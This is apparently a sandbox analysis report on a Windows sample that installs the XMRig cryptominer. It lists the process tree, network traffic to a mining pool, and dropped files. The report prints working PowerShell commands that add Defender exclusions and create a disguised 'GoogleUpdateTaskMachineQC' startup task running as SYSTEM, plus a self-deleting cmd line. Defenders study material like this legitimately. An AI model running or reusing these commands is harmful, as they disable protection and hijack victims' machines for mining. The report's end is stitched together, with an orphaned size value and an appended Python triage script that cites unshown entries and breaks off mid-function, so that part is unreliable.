Analysis

  • max time kernel
    1799s
  • max time network
    1796s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    24/10/2024, 20:08 UTC

General

  • Target

    grhddhsGHswgh/qM5GMXBk6hJE6Y5e (18).exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 30 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3468
      • C:\Users\Admin\AppData\Local\Temp\grhddhsGHswgh\qM5GMXBk6hJE6Y5e (18).exe
        "C:\Users\Admin\AppData\Local\Temp\grhddhsGHswgh\qM5GMXBk6hJE6Y5e (18).exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:3892
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1552
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1388
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4896
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
            3⤵
            PID:3720
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhddhsGHswgh\qM5GMXBk6hJE6Y5e (18).exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:5048
          • C:\Windows\System32\choice.exe
            choice /C Y /N /D Y /T 3
            3⤵
            PID:2188
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        PID:3308
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        PID:3416
      • C:\Windows\System32\conhost.exe
        C:\Windows\System32\conhost.exe qtdiqnkejoz
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious behavior: EnumeratesProcesses
        PID:800
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
        2⤵
        • Drops file in Program Files directory
        PID:2712
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
        2⤵
        • Drops file in Program Files directory
        • Suspicious use of WriteProcessMemory
        PID:1468
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic PATH Win32_VideoController GET Name, VideoProcessor
            3⤵
            • Detects videocard installed
            PID:4296
      • C:\Windows\System32\conhost.exe
        C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
        2⤵
        PID:5108
  • C:\Program Files\Google\Chrome\updater.exe
    "C:\Program Files\Google\Chrome\updater.exe"
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4564

Network

          • DNS
            217.106.137.52.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            217.106.137.52.in-addr.arpa
            IN PTR
            Response
          • DNS
            8.8.8.8.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            8.8.8.8.in-addr.arpa
            IN PTR
            Response
            8.8.8.8.in-addr.arpa
            IN PTR
            dnsgoogle
          • DNS
            134.190.18.2.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            134.190.18.2.in-addr.arpa
            IN PTR
            Response
            134.190.18.2.in-addr.arpa
            IN PTR
            a2-18-190-134deploystaticakamaitechnologiescom
          • DNS
            g.bing.com
            Remote address:
            8.8.8.8:53
            Request
            g.bing.com
            IN A
            Response
            g.bing.com
            IN CNAME
            g-bing-com.ax-0001.ax-msedge.net
            g-bing-com.ax-0001.ax-msedge.net
            IN CNAME
            ax-0001.ax-msedge.net
            ax-0001.ax-msedge.net
            IN A
            150.171.27.10
            ax-0001.ax-msedge.net
            IN A
            150.171.28.10
          • GET
            https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ea959735a59644158489f32f2233c8f3&localId=w:47999119-06B9-CF8D-8780-3C81959A9B6E&deviceId=6755476188931877&anid=
            Remote address:
            150.171.27.10:443
            Request
            GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ea959735a59644158489f32f2233c8f3&localId=w:47999119-06B9-CF8D-8780-3C81959A9B6E&deviceId=6755476188931877&anid= HTTP/2.0
            host: g.bing.com
            accept-encoding: gzip, deflate
            user-agent: WindowsShellClient/9.0.40929.0 (Windows)
            Response
            HTTP/2.0 204
            cache-control: no-cache, must-revalidate
            pragma: no-cache
            expires: Fri, 01 Jan 1990 00:00:00 GMT
            set-cookie: MUID=2AFF980F0AB96BE321A78D2D0B266AFF; domain=.bing.com; expires=Tue, 18-Nov-2025 21:01:46 GMT; path=/; SameSite=None; Secure; Priority=High;
            strict-transport-security: max-age=31536000; includeSubDomains; preload
            access-control-allow-origin: *
            x-cache: CONFIG_NOCACHE
            accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
            x-msedge-ref: Ref A: 24923A6441CC47C9A1AA735941D423E5 Ref B: LON601060103062 Ref C: 2024-10-24T21:01:46Z
            date: Thu, 24 Oct 2024 21:01:45 GMT
          • GET
            https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=ea959735a59644158489f32f2233c8f3&localId=w:47999119-06B9-CF8D-8780-3C81959A9B6E&deviceId=6755476188931877&anid=
            Remote address:
            150.171.27.10:443
            Request
            GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=ea959735a59644158489f32f2233c8f3&localId=w:47999119-06B9-CF8D-8780-3C81959A9B6E&deviceId=6755476188931877&anid= HTTP/2.0
            host: g.bing.com
            accept-encoding: gzip, deflate
            user-agent: WindowsShellClient/9.0.40929.0 (Windows)
            cookie: MUID=2AFF980F0AB96BE321A78D2D0B266AFF
            Response
            HTTP/2.0 204
            cache-control: no-cache, must-revalidate
            pragma: no-cache
            expires: Fri, 01 Jan 1990 00:00:00 GMT
            set-cookie: MSPTC=JI_4L40337b0FxMyZfGuQik0ynP1xCl3_DHk1MrZV7w; domain=.bing.com; expires=Tue, 18-Nov-2025 21:01:46 GMT; path=/; Partitioned; secure; SameSite=None
            strict-transport-security: max-age=31536000; includeSubDomains; preload
            access-control-allow-origin: *
            x-cache: CONFIG_NOCACHE
            accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
            x-msedge-ref: Ref A: 1B79AF57CE7C472699247C05CA3988AD Ref B: LON601060103062 Ref C: 2024-10-24T21:01:46Z
            date: Thu, 24 Oct 2024 21:01:45 GMT
          • GET
            https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ea959735a59644158489f32f2233c8f3&localId=w:47999119-06B9-CF8D-8780-3C81959A9B6E&deviceId=6755476188931877&anid=
            Remote address:
            150.171.27.10:443
            Request
            GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ea959735a59644158489f32f2233c8f3&localId=w:47999119-06B9-CF8D-8780-3C81959A9B6E&deviceId=6755476188931877&anid= HTTP/2.0
            host: g.bing.com
            accept-encoding: gzip, deflate
            user-agent: WindowsShellClient/9.0.40929.0 (Windows)
            cookie: MUID=2AFF980F0AB96BE321A78D2D0B266AFF; MSPTC=JI_4L40337b0FxMyZfGuQik0ynP1xCl3_DHk1MrZV7w
            Response
            HTTP/2.0 204
            cache-control: no-cache, must-revalidate
            pragma: no-cache
            expires: Fri, 01 Jan 1990 00:00:00 GMT
            strict-transport-security: max-age=31536000; includeSubDomains; preload
            access-control-allow-origin: *
            x-cache: CONFIG_NOCACHE
            accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
            x-msedge-ref: Ref A: 35128D3C09354543B0C8EB37BE623D24 Ref B: LON601060103062 Ref C: 2024-10-24T21:01:46Z
            date: Thu, 24 Oct 2024 21:01:46 GMT
          • DNS
            17.160.190.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            17.160.190.20.in-addr.arpa
            IN PTR
            Response
          • DNS
            10.27.171.150.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            10.27.171.150.in-addr.arpa
            IN PTR
            Response
          • DNS
            95.221.229.192.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            95.221.229.192.in-addr.arpa
            IN PTR
            Response
          • DNS
            26.35.223.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            26.35.223.20.in-addr.arpa
            IN PTR
            Response
          • DNS
            196.249.167.52.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            196.249.167.52.in-addr.arpa
            IN PTR
            Response
          • DNS
            197.87.175.4.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            197.87.175.4.in-addr.arpa
            IN PTR
            Response
          • DNS
            171.39.242.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            171.39.242.20.in-addr.arpa
            IN PTR
            Response
          • DNS
            171.39.242.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            171.39.242.20.in-addr.arpa
            IN PTR
          • DNS
            139.190.18.2.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            139.190.18.2.in-addr.arpa
            IN PTR
            Response
            139.190.18.2.in-addr.arpa
            IN PTR
            a2-18-190-139deploystaticakamaitechnologiescom
          • DNS
            139.190.18.2.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            139.190.18.2.in-addr.arpa
            IN PTR
          • DNS
            pool.hashvault.pro
            conhost.exe
            Remote address:
            8.8.8.8:53
            Request
            pool.hashvault.pro
            IN A
            Response
            pool.hashvault.pro
            IN A
            95.179.241.203
            pool.hashvault.pro
            IN A
            45.76.89.70
          • DNS
            70.89.76.45.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            70.89.76.45.in-addr.arpa
            IN PTR
            Response
            70.89.76.45.in-addr.arpa
            IN PTR
            45768970vultrusercontentcom
          • DNS
            133.190.18.2.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            133.190.18.2.in-addr.arpa
            IN PTR
            Response
            133.190.18.2.in-addr.arpa
            IN PTR
            a2-18-190-133deploystaticakamaitechnologiescom
          • DNS
            30.243.111.52.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            30.243.111.52.in-addr.arpa
            IN PTR
            Response
          • DNS
            7.173.189.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            7.173.189.20.in-addr.arpa
            IN PTR
            Response
          • 150.171.27.10:443
            https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ea959735a59644158489f32f2233c8f3&localId=w:47999119-06B9-CF8D-8780-3C81959A9B6E&deviceId=6755476188931877&anid=
            tls, http2
            2.1kB
            10.8kB
            23
            20

            HTTP Request

            GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ea959735a59644158489f32f2233c8f3&localId=w:47999119-06B9-CF8D-8780-3C81959A9B6E&deviceId=6755476188931877&anid=

            HTTP Response

            204

            HTTP Request

            GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=ea959735a59644158489f32f2233c8f3&localId=w:47999119-06B9-CF8D-8780-3C81959A9B6E&deviceId=6755476188931877&anid=

            HTTP Response

            204

            HTTP Request

            GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ea959735a59644158489f32f2233c8f3&localId=w:47999119-06B9-CF8D-8780-3C81959A9B6E&deviceId=6755476188931877&anid=

            HTTP Response

            204
          • 45.76.89.70:3333
            pool.hashvault.pro
            tls
            conhost.exe
            30.6kB
            77.0kB
            257
            206
          • 8.8.8.8:53
            217.106.137.52.in-addr.arpa
            dns
            73 B
            147 B
            1
            1

            DNS Request

            217.106.137.52.in-addr.arpa

          • 8.8.8.8:53
            8.8.8.8.in-addr.arpa
            dns
            66 B
            90 B
            1
            1

            DNS Request

            8.8.8.8.in-addr.arpa

          • 8.8.8.8:53
            134.190.18.2.in-addr.arpa
            dns
            71 B
            135 B
            1
            1

            DNS Request

            134.190.18.2.in-addr.arpa

          • 8.8.8.8:53
            g.bing.com
            dns
            56 B
            148 B
            1
            1

            DNS Request

            g.bing.com

            DNS Response

            150.171.27.10
            150.171.28.10

          • 8.8.8.8:53
            17.160.190.20.in-addr.arpa
            dns
            72 B
            158 B
            1
            1

            DNS Request

            17.160.190.20.in-addr.arpa

          • 8.8.8.8:53
            10.27.171.150.in-addr.arpa
            dns
            72 B
            158 B
            1
            1

            DNS Request

            10.27.171.150.in-addr.arpa

          • 8.8.8.8:53
            95.221.229.192.in-addr.arpa
            dns
            73 B
            144 B
            1
            1

            DNS Request

            95.221.229.192.in-addr.arpa

          • 8.8.8.8:53
            26.35.223.20.in-addr.arpa
            dns
            71 B
            157 B
            1
            1

            DNS Request

            26.35.223.20.in-addr.arpa

          • 8.8.8.8:53
            196.249.167.52.in-addr.arpa
            dns
            73 B
            147 B
            1
            1

            DNS Request

            196.249.167.52.in-addr.arpa

          • 8.8.8.8:53
            197.87.175.4.in-addr.arpa
            dns
            71 B
            157 B
            1
            1

            DNS Request

            197.87.175.4.in-addr.arpa

          • 8.8.8.8:53
            171.39.242.20.in-addr.arpa
            dns
            144 B
            158 B
            2
            1

            DNS Request

            171.39.242.20.in-addr.arpa

            DNS Request

            171.39.242.20.in-addr.arpa

          • 8.8.8.8:53
            139.190.18.2.in-addr.arpa
            dns
            142 B
            135 B
            2
            1

            DNS Request

            139.190.18.2.in-addr.arpa

            DNS Request

            139.190.18.2.in-addr.arpa

          • 8.8.8.8:53
            pool.hashvault.pro
            dns
            conhost.exe
            64 B
            96 B
            1
            1

            DNS Request

            pool.hashvault.pro

            DNS Response

            95.179.241.203
            45.76.89.70

          • 8.8.8.8:53
            70.89.76.45.in-addr.arpa
            dns
            70 B
            116 B
            1
            1

            DNS Request

            70.89.76.45.in-addr.arpa

          • 8.8.8.8:53
            133.190.18.2.in-addr.arpa
            dns
            71 B
            135 B
            1
            1

            DNS Request

            133.190.18.2.in-addr.arpa

          • 8.8.8.8:53
            30.243.111.52.in-addr.arpa
            dns
            72 B
            158 B
            1
            1

            DNS Request

            30.243.111.52.in-addr.arpa

          • 8.8.8.8:53
            7.173.189.20.in-addr.arpa
            dns
            71 B
            157 B
            1
            1

            DNS Request

            7.173.189.20.in-addr.arpa

          Downloads

          • C:\Program Files\Google\Chrome\updater.exe

            Filesize

            2.0MB

            MD5

            a16a669a09bf158058b83e04e69fe38e

            SHA1

            f6c94763850d9e590d86057139e8895a7aacdeea

            SHA256

            cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

            SHA512

            658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

          • C:\Program Files\Google\Libs\g.log

            Filesize

            226B

            MD5

            fdba80d4081c28c65e32fff246dc46cb

            SHA1

            74f809dedd1fc46a3a63ac9904c80f0b817b3686

            SHA256

            b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

            SHA512

            b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            944B

            MD5

            77d622bb1a5b250869a3238b9bc1402b

            SHA1

            d47f4003c2554b9dfc4c16f22460b331886b191b

            SHA256

            f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

            SHA512

            d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            9121c719774820cf08353d8ba2a9e35f

            SHA1

            6145d196f22031214edf3d806b9598e1d0e4c3db

            SHA256

            28ff000c313d01c2a2d055f33db2bb6d9827351739f60003a97003b5ce5ef214

            SHA512

            b33d465182898c6ca298539b29dcd4c42f0e83267b33186e12cad64dc560dcfff987f91eafc0df7cbd744550605e6cfc5d81c234fbc54392bc273613ba050bd4

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h2fz3k24.gxf.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            4KB

            MD5

            bdb25c22d14ec917e30faf353826c5de

            SHA1

            6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

            SHA256

            e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

            SHA512

            b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            b42c70c1dbf0d1d477ec86902db9e986

            SHA1

            1d1c0a670748b3d10bee8272e5d67a4fabefd31f

            SHA256

            8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

            SHA512

            57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5


            8.0MB

          • memory/5108-105-0x000001AE910D0000-0x000001AE910F0000-memory.dmp

            Filesize

            128KB

          • memory/5108-141-0x00007FF67DA30000-0x00007FF67E224000-memory.dmp

            Filesize

            8.0MB

          • memory/5108-143-0x00007FF67DA30000-0x00007FF67E224000-memory.dmp

            Filesize

            8.0MB

          • memory/5108-145-0x00007FF67DA30000-0x00007FF67E224000-memory.dmp

            Filesize

            8.0MB

          • memory/5108-147-0x00007FF67DA30000-0x00007FF67E224000-memory.dmp

            Filesize

            8.0MB

          • memory/5108-149-0x00007FF67DA30000-0x00007FF67E224000-memory.dmp

            Filesize

            8.0MB

          • memory/5108-151-0x00007FF67DA30000-0x00007FF67E224000-memory.dmp

            Filesize

            8.0MB

          • memory/5108-153-0x00007FF67DA30000-0x00007FF67E224000-memory.dmp

            Filesize

            8.0MB

          • memory/5108-155-0x00007FF67DA30000-0x00007FF67E224000-memory.dmp

            Filesize

            8.0MB

          • memory/5108-157-0x00007FF67DA30000-0x00007FF67E224000-memory.dmp

            Filesize

            8.0MB

          • memory/5108-159-0x00007FF67DA30000-0x00007FF67E224000-memory.dmp

            Filesize

            8.0MB

          • memory/5108-161-0x00007FF67DA30000-0x00007FF67E224000-memory.dmp

            Filesize

            8.0MB

          • memory/5108-163-0x00007FF67DA30000-0x00007FF67E224000-memory.dmp

            Filesize

            8.0MB

          • memory/5108-165-0x00007FF67DA30000-0x00007FF67E224000-memory.dmp

            Filesize

            8.0MB

          • memory/5108-167-0x00007FF67DA30000-0x00007FF67E224000-memory.dmp

            Filesize

            8.0MB
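The dump names in this list encode the process, the dump's sequence number and the virtual address range that was captured, and the listed Filesize is just the length of that range. When the same region of one process shows up dozens of times (as the 8.0MB region of PID 5108 does above), the useful triage view is the set of unique regions per process, not the raw list. The following is an added example, not tria.ge's own code: it parses the name format used above, recomputes each size from the addresses and checks it against the listed value, collapses repeated dumps of the same region, and tags regions by address range. The `SAMPLE_DUMPS` list is a constructed subset of the entries above, and the address-range classification is a heuristic assumed by this example (images near the top of the x64 user address space, private allocations low), not something the report states.

```python
import re
from collections import defaultdict

# tria.ge names each dump memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp
# (pattern taken from the entries listed above; <seq> is the dump's order within the run).
DUMP_RE = re.compile(
    r"memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp"
)

# Constructed sample: a subset of the dumps listed above, each paired with the Filesize the report shows.
SAMPLE_DUMPS = [
    ("memory/1552-16-0x00007FF986C50000-0x00007FF987711000-memory.dmp", "10.8MB"),
    ("memory/1552-4-0x000001E341700000-0x000001E341722000-memory.dmp", "136KB"),
    ("memory/3308-69-0x000001A1AD7E0000-0x000001A1AD895000-memory.dmp", "724KB"),
    ("memory/3892-0-0x00007FF7F0BF0000-0x00007FF7F0E01000-memory.dmp", "2.1MB"),
    ("memory/4564-49-0x00007FF64F780000-0x00007FF64F991000-memory.dmp", "2.1MB"),
    ("memory/5108-103-0x00007FF67DA30000-0x00007FF67E224000-memory.dmp", "8.0MB"),
    ("memory/5108-135-0x00007FF67DA30000-0x00007FF67E224000-memory.dmp", "8.0MB"),
    ("memory/5108-105-0x000001AE910D0000-0x000001AE910F0000-memory.dmp", "128KB"),
]


def parse_dump_name(name):
    """Split a dump name into pid, seq, start, end and the region size in bytes."""
    m = DUMP_RE.fullmatch(name)
    if not m:
        raise ValueError(f"not a tria.ge memory dump name: {name}")
    start, end = int(m["start"], 16), int(m["end"], 16)
    if end <= start:
        raise ValueError(f"end address is not above start address: {name}")
    return {"pid": int(m["pid"]), "seq": int(m["seq"]), "start": start, "end": end, "size": end - start}


def human_size(nbytes):
    """Format a byte count the way the report does: one decimal in MB, whole KB below 1MB."""
    if nbytes >= 1 << 20:
        return f"{nbytes / (1 << 20):.1f}MB"
    return f"{nbytes / 1024:.0f}KB"


def region_kind(start):
    """Heuristic (an assumption of this example, not something the report states):
    on x64 Windows 10 with high-entropy ASLR, images are mapped near the top of the
    user address space (0x00007FF...), while heaps and VirtualAlloc'd buffers land low."""
    return "image-range" if start >= 0x00007FF000000000 else "private-range"


def check_sizes(entries):
    """Names whose computed end-start disagrees with the listed Filesize (expected to be empty)."""
    return [name for name, listed in entries if human_size(parse_dump_name(name)["size"]) != listed]


def unique_regions(entries):
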